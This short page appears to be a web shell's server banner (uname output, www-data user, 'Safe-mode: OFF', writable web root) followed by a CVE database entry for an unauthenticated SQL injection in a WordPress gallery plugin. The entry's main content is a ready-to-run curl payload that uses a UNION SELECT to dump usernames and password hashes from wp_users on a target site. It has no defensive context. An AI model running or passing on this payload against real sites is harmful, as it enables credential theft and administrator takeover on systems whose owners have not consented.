Software: Apache/2.4.68 (Debian). PHP/8.2.33 uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/ drwxrwxrwx | |
|
[← Back to CVE DB] DescriptionUnauthenticated SQL injection in the Nifty Gallery WordPress plugin. A crafted request to the gallery endpoint can dump user credentials and take over admin accounts. PoC / Payload — CVE-2022-29460 curl -s 'http://TARGET/wp-admin/admin-ajax.php?action=niftygallery&id=0%20UNION%20SELECT%201,user_login,user_pass,4,5,6,7,8,9,10%20FROM%20wp_users' |